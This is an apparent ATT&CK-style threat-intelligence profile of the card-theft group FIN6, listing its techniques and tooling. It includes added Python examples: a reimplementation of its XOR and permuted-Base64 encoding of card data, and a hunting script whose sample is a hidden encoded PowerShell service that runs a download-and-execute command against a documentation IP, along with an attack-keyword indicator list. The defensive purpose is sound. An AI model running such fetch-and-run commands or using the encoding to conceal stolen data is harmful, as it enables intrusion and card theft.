
FIN6

FIN6 is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)
ID: G0037
Associated Groups: TAAL, ITG08, Skeleton Spider, Camouflage Tempest, Magecart Group 6
Version: 4.0
Created: 31 May 2017
Last Modified: 17 Nov 2024

Associated Group Descriptions

Name Description
TAAL (Citation: Microsoft Threat Actor Naming July 2023)
ITG08 (Citation: Security Intelligence More Eggs Aug 2019)
Skeleton Spider (Citation: Crowdstrike Global Threat Report Feb 2018)
Camouflage Tempest (Citation: Microsoft Threat Actor Naming July 2023)
Magecart Group 6 (Citation: Security Intelligence ITG08 April 2020)

Techniques Used

Domain ID Name Use
Enterprise T1087 .002 Account Discovery: Domain Account

FIN6 has used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim's Active Directory database.(Citation: FireEye FIN6 April 2016)

Enterprise T1560 .003 Archive Collected Data: Archive via Custom Method

FIN6 has encoded data gathered from the victim with a simple substitution cipher and single-byte XOR using the 0xAA key, and Base64 with character permutation.(Citation: FireEye FIN6 April 2016)(Citation: Trend Micro FIN6 October 2019)
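The following Python example is added here to illustrate the layered encoding described above; it is not FrameworkPOS code and not code from the cited reports. Only the 0xAA XOR key comes from the page. The byte-substitution table (a nibble swap), the Base64 alphabet permutation (a rotation by 13 positions) and the sample Track 2 record are assumptions chosen for illustration. The point it makes: output produced this way is still syntactically valid Base64 and decodes without error, but yields the wrong bytes unless the permuted alphabet is known.

```python
import base64
import string

# Illustrative implementation of the chain the page describes:
# substitution -> single-byte XOR 0xAA -> Base64 over a permuted alphabet.
# SUB_TABLE and PERMUTED_ALPHABET are HYPOTHETICAL; only XOR_KEY is from the reporting.

XOR_KEY = 0xAA

# Hypothetical byte substitution: swap the two nibbles of every byte (a bijection on 0..255).
SUB_TABLE = bytes(((b & 0x0F) << 4) | (b >> 4) for b in range(256))
INV_SUB_TABLE = bytes(SUB_TABLE.index(v) for v in range(256))

# Standard Base64 alphabet and a hypothetical permutation of it (rotation by 13).
STD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
PERMUTED_ALPHABET = STD_ALPHABET[13:] + STD_ALPHABET[:13]
_TO_PERMUTED = str.maketrans(STD_ALPHABET, PERMUTED_ALPHABET)
_TO_STANDARD = str.maketrans(PERMUTED_ALPHABET, STD_ALPHABET)


def substitute(data: bytes, table: bytes = SUB_TABLE) -> bytes:
    """Byte-for-byte substitution through a 256-entry table."""
    return data.translate(table)


def xor_bytes(data: bytes, key: int = XOR_KEY) -> bytes:
    """Single-byte XOR; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def encode_track_data(plaintext: bytes) -> str:
    """Apply the full chain as the malware would before staging/exfiltration."""
    std_b64 = base64.b64encode(xor_bytes(substitute(plaintext))).decode("ascii")
    return std_b64.translate(_TO_PERMUTED)  # '=' padding is not in either alphabet, so untouched


def decode_track_data(encoded: str) -> bytes:
    """Invert the chain: un-permute the alphabet, Base64-decode, XOR, un-substitute."""
    xored = base64.b64decode(encoded.translate(_TO_STANDARD))
    return substitute(xor_bytes(xored), INV_SUB_TABLE)


def naive_decode(encoded: str) -> bytes:
    """What an analyst gets by assuming the STANDARD alphabet: valid Base64, wrong bytes."""
    return substitute(xor_bytes(base64.b64decode(encoded)), INV_SUB_TABLE)


# Constructed sample: a Track 2-style record built around the well-known 4111... test PAN.
SAMPLE_TRACK2 = b";4111111111111111=25121010000012345678?"

if __name__ == "__main__":
    blob = encode_track_data(SAMPLE_TRACK2)
    print("encoded :", blob)
    print("decoded :", decode_track_data(blob))
    print("naive   :", naive_decode(blob))
```

When hunting for staged card data, searching for PAN patterns in files or traffic will miss blobs encoded this way; `naive_decode` shows that an off-the-shelf Base64 decoder plus the known XOR key is still not enough without the alphabet permutation.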

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

FIN6 has used Registry Run keys to establish persistence for its downloader tools known as HARDTACK and SHIPBREAD.(Citation: FireEye FIN6 April 2016)

Enterprise T1110 .002 Brute Force: Password Cracking

FIN6 has extracted password hashes from ntds.dit to crack offline.(Citation: FireEye FIN6 April 2016)

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

FIN6 has used PowerShell to gain access to merchants' networks, and a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)(Citation: Visa FIN6 Feb 2019)

Enterprise T1059 .003 Command and Scripting Interpreter: Windows Command Shell

FIN6 has used a kill.bat script to disable security tools.(Citation: FireEye FIN6 Apr 2019)

Enterprise T1059 .007 Command and Scripting Interpreter: JavaScript

FIN6 has used malicious JavaScript to steal payment card data from e-commerce sites.(Citation: Trend Micro FIN6 October 2019)

Enterprise T1555 .003 Credentials from Password Stores: Credentials from Web Browsers

FIN6 has used the Stealer One credential stealer to target web browsers.(Citation: Visa FIN6 Feb 2019)

Enterprise T1074 .002 Data Staged: Remote Data Staging

FIN6 actors have compressed data from remote systems and moved it to another staging system before exfiltration.(Citation: FireEye FIN6 April 2016)

Enterprise T1573 .002 Encrypted Channel: Asymmetric Cryptography

FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.(Citation: FireEye FIN6 April 2016)

Enterprise T1048 .003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol

FIN6 has sent stolen payment card data to remote servers via HTTP POSTs.(Citation: Trend Micro FIN6 October 2019)

Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

FIN6 has deployed a utility script named kill.bat to disable anti-virus.(Citation: FireEye FIN6 Apr 2019)

Enterprise T1070 .004 Indicator Removal: File Deletion

FIN6 has removed files from victim machines.(Citation: FireEye FIN6 April 2016)

Enterprise T1036 .004 Masquerading: Masquerade Task or Service

FIN6 has renamed the "psexec" service to "mstdc" to masquerade as a legitimate Windows service.(Citation: FireEye FIN6 Apr 2019)

Enterprise T1003 .001 OS Credential Dumping: LSASS Memory

FIN6 has used Windows Credential Editor for credential dumping.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)

Enterprise T1003 .003 OS Credential Dumping: NTDS

FIN6 has used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim's Active Directory database.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)

Enterprise T1027 .010 Obfuscated Files or Information: Command Obfuscation

FIN6 has used encoded PowerShell commands.(Citation: Visa FIN6 Feb 2019)

Enterprise T1588 .002 Obtain Capabilities: Tool

FIN6 has obtained and used tools such as Mimikatz, Cobalt Strike, and AdFind.(Citation: Security Intelligence More Eggs Aug 2019)(Citation: FireEye FIN6 Apr 2019)

Enterprise T1069 .002 Permission Groups Discovery: Domain Groups

FIN6 has used tools like AdFind to query users, groups, organizational units, and trusts.(Citation: FireEye FIN6 Apr 2019)

Enterprise T1566 .001 Phishing: Spearphishing Attachment

FIN6 has targeted victims with e-mails containing malicious attachments.(Citation: Visa FIN6 Feb 2019)

Enterprise T1566 .003 Phishing: Spearphishing via Service

FIN6 has used fake job advertisements sent via LinkedIn to spearphish targets.(Citation: Security Intelligence More Eggs Aug 2019)

Enterprise T1021 .001 Remote Services: Remote Desktop Protocol

FIN6 used RDP to move laterally in victim networks.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)

Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

FIN6 has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and FrameworkPOS.(Citation: FireEye FIN6 April 2016)

Enterprise T1553 .002 Subvert Trust Controls: Code Signing

FIN6 has used Comodo code-signing certificates.(Citation: Security Intelligence More Eggs Aug 2019)

Enterprise T1569 .002 System Services: Service Execution

FIN6 has created Windows services to execute encoded PowerShell commands.(Citation: FireEye FIN6 Apr 2019)
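The following Python example is added here (it is not FIN6 tooling and not code from the cited reports) to show how an analyst can hunt for the pattern described under T1569.002 above and under T1027.010 and T1059.001 earlier on this page: a Windows service whose ImagePath launches powershell.exe with an encoded command. It decodes the Base64/UTF-16LE argument and checks the result against a small indicator list. The service names, ImagePath strings, the 192.0.2.10 URL and the indicator list are all constructed for the example; feed it real (service name, ImagePath) pairs exported from the registry or from your EDR.

```python
import base64
import binascii
import re
from typing import Optional

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -en, -enc, ...)
# plus the alias -ec. The argument that follows is Base64 of the UTF-16LE command text.
FLAG_RE = re.compile(r"(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Illustrative indicators only (constructed for this example); extend from your own telemetry.
INDICATORS = ("IEX", "Invoke-Expression", "DownloadString", "Net.WebClient",
              "FromBase64String", "VirtualAlloc", "TcpListener")


def _is_encoded_flag(flag: str) -> bool:
    f = flag.lower()
    return f == "ec" or "encodedcommand".startswith(f)


def decode_encoded_command(token: str) -> Optional[str]:
    """Return the decoded command text, or None if the token is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def inspect_image_path(service_name: str, image_path: str) -> Optional[dict]:
    """Flag a service whose ImagePath runs PowerShell with an encoded command."""
    if "powershell" not in image_path.lower():
        return None
    for m in FLAG_RE.finditer(image_path):
        if not _is_encoded_flag(m.group(1)):
            continue
        decoded = decode_encoded_command(m.group(2))
        hits = [i for i in INDICATORS if decoded and i.lower() in decoded.lower()]
        return {"service": service_name, "decoded": decoded, "indicators": hits}
    return None


def hunt(records):
    """records: iterable of (service_name, image_path). Returns the list of findings."""
    return [f for f in (inspect_image_path(n, p) for n, p in records) if f]


def encode_powershell(cmd: str) -> str:
    """Encode text the way -EncodedCommand expects; used only to build the sample below."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


# Constructed sample records (service name, ImagePath); not real telemetry.
# 192.0.2.0/24 is documentation address space.
SAMPLE_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage')"
SAMPLE_SERVICES = [
    ("Dnscache", r"C:\Windows\system32\svchost.exe -k NetworkService -p"),
    ("SysMaint", r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -enc '
                 + encode_powershell(SAMPLE_COMMAND)),
    ("Backup", r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_SERVICES):
        print(finding["service"], finding["indicators"])
        print("   ", finding["decoded"])
```

The decoded text, not the Base64 token, is what should be matched and retained in the alert: the same payload re-encodes to a different token under trivial changes (an extra space, a different casing), while the indicator hits survive. The regex deliberately ignores switches such as -ExecutionPolicy that happen to start with "e" but are not a prefix of -EncodedCommand.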

Enterprise T1204 .002 User Execution: Malicious File

FIN6 has used malicious documents to lure victims into allowing execution of PowerShell scripts.(Citation: Visa FIN6 Feb 2019)

Software

ID Name References Techniques
S0503 FrameworkPOS (Citation: Crowdstrike Global Threat Report Feb 2018) (Citation: SentinelOne FrameworkPOS September 2019) (Citation: Trinity) (Citation: Visa FIN6 Feb 2019) Archive via Custom Method, Local Data Staging, Data from Local System, Process Discovery, Exfiltration Over Alternative Protocol
S0005 Windows Credential Editor (Citation: Amplia WCE) (Citation: FireEye FIN6 April 2016) LSASS Memory
S0381 FlawedAmmyy (Citation: Proofpoint TA505 Mar 2018) (Citation: Visa FIN6 Feb 2019) Windows Management Instrumentation, Screen Capture, System Owner/User Discovery, Rundll32, Keylogging, Symmetric Cryptography, Clipboard Data, Peripheral Device Discovery, System Information Discovery, Msiexec, Data from Local System, Exfiltration Over C2 Channel, PowerShell, Registry Run Keys / Startup Folder, Local Groups, Data Obfuscation, Input Capture, Security Software Discovery, Windows Command Shell, File Deletion, Web Protocols, Ingress Tool Transfer, Commonly Used Port
S0372 LockerGoga (Citation: CarbonBlack LockerGoga 2019) (Citation: FireEye FIN6 Apr 2019) (Citation: Unit42 LockerGoga 2019) Code Signing, Disable or Modify Tools, Account Access Removal, Data Encrypted for Impact, Lateral Tool Transfer, File Deletion, System Shutdown/Reboot
S0446 Ryuk (Citation: Bleeping Computer - Ryuk WoL) (Citation: CrowdStrike Ryuk January 2019) (Citation: FireEye FIN6 Apr 2019) (Citation: FireEye Ryuk and Trickbot January 2019) Scheduled Task, Match Legitimate Resource Name or Location, Service Stop, Windows File and Directory Permissions Modification, System Information Discovery, Native API, Masquerading, Process Injection, Traffic Signaling, SMB/Windows Admin Shares, System Network Configuration Discovery, File and Directory Discovery, Process Discovery, Registry Run Keys / Startup Folder, Disable or Modify Tools, Obfuscated Files or Information, Data Encrypted for Impact, System Language Discovery, Domain Accounts, Windows Command Shell, Access Token Manipulation, Inhibit System Recovery
S0154 Cobalt Strike (Citation: FireEye FIN6 Apr 2019) (Citation: cobaltstrike manual) Windows Management Instrumentation, Screen Capture, Rundll32, Standard Encoding, Keylogging, JavaScript, Bypass User Account Control, Sudo and Sudo Caching, Security Account Manager, DNS, Domain Account, Symmetric Cryptography, Windows Service, Domain Groups, SSH, System Service Discovery, Code Signing, Network Share Discovery, Application Layer Protocol, Native API, Data from Local System, Deobfuscate/Decode Files or Information, Process Injection, Timestomp, Reflective Code Loading, Scheduled Transfer, SMB/Windows Admin Shares, Protocol Tunneling, Browser Session Hijacking, Modify Registry, Windows Remote Management, LSASS Memory, Distributed Component Object Model, System Network Configuration Discovery, Office Template Macros, File and Directory Discovery, System Network Connections Discovery, Token Impersonation/Theft, Make and Impersonate Token, Process Discovery, Parent PID Spoofing, PowerShell, Multiband Communication, File Transfer Protocols, Local Groups, Disable or Modify Tools, Indicator Removal from Tools, Process Hollowing, Exploitation for Privilege Escalation, Obfuscated Files or Information, Exploitation for Client Execution, Asymmetric Cryptography, Non-Application Layer Protocol, Protocol or Service Impersonation, Query Registry, Data Transfer Size Limits, Domain Accounts, BITS Jobs, Domain Fronting, Python, Windows Command Shell, Web Protocols, Visual Basic, Remote System Discovery, Network Service Discovery, Software Discovery, Pass the Hash, Ingress Tool Transfer, Remote Desktop Protocol, Service Execution, Dynamic-link Library Injection, Internal Proxy, Custom Command and Control Protocol, Commonly Used Port, Local Accounts, Process Argument Spoofing
S0002 Mimikatz (Citation: Adsecurity Mimikatz Guide) (Citation: Deply Mimikatz) (Citation: Security Intelligence More Eggs Aug 2019) Security Account Manager, LSA Secrets, Credentials from Password Stores, Security Support Provider, Rogue Domain Controller, Credentials from Web Browsers, Private Keys, LSASS Memory, Golden Ticket, Pass the Ticket, Steal or Forge Authentication Certificates, Account Manipulation, SID-History Injection, Silver Ticket, Windows Credential Manager, Pass the Hash, DCSync
S0284 More_eggs (Citation: Crowdstrike GTR2020 Mar 2020) (Citation: ESET EvilNum July 2020) (Citation: SKID) (Citation: Security Intelligence More Eggs Aug 2019) (Citation: SpicyOmelette) (Citation: Talos Cobalt Group July 2018) (Citation: Terra Loader) (Citation: Visa FIN6 Feb 2019) System Owner/User Discovery, Standard Encoding, Encrypted/Encoded File, Internet Connection Discovery, Symmetric Cryptography, Code Signing, System Information Discovery, Deobfuscate/Decode Files or Information, System Network Configuration Discovery, Regsvr32, Security Software Discovery, Windows Command Shell, File Deletion, Web Protocols, Ingress Tool Transfer
S0632 GrimAgent (Citation: Group IB GrimAgent July 2021) Scheduled Task, System Owner/User Discovery, Standard Encoding, Symmetric Cryptography, System Information Discovery, Native API, Data from Local System, Deobfuscate/Decode Files or Information, Mutual Exclusion, Time Based Evasion, Binary Padding, System Network Configuration Discovery, File and Directory Discovery, Exfiltration Over C2 Channel, Registry Run Keys / Startup Folder, Obfuscated Files or Information, Asymmetric Cryptography, System Language Discovery, System Location Discovery, Windows Command Shell, Clear Persistence, File Deletion, Web Protocols, Ingress Tool Transfer, Junk Data
S0449 Maze (Citation: FireEye Maze May 2020) (Citation: McAfee Maze March 2020) (Citation: Sophos Maze VM September 2020) Scheduled Task, Windows Management Instrumentation, Service Stop, System Information Discovery, Msiexec, Native API, Junk Code Insertion, Indicator Removal, Dynamic Resolution, Masquerade Task or Service, System Network Connections Discovery, Process Discovery, Registry Run Keys / Startup Folder, Disable or Modify Tools, Obfuscated Files or Information, Run Virtual Instance, Data Encrypted for Impact, System Language Discovery, Windows Command Shell, Web Protocols, Dynamic-link Library Injection, Inhibit System Recovery, System Shutdown/Reboot
S0552 AdFind (Citation: FireEye FIN6 Apr 2019) (Citation: FireEye Ryuk and Trickbot January 2019) (Citation: Red Canary Hospital Thwarted Ryuk October 2020) Domain Account, Domain Groups, System Network Configuration Discovery, Domain Trust Discovery, Remote System Discovery
S0029 PsExec (Citation: FireEye FIN6 Apr 2019) (Citation: FireEye FIN6 April 2016) (Citation: Russinovich Sysinternals) (Citation: SANS PsExec) Windows Service, SMB/Windows Admin Shares, Domain Account, Lateral Tool Transfer, Service Execution
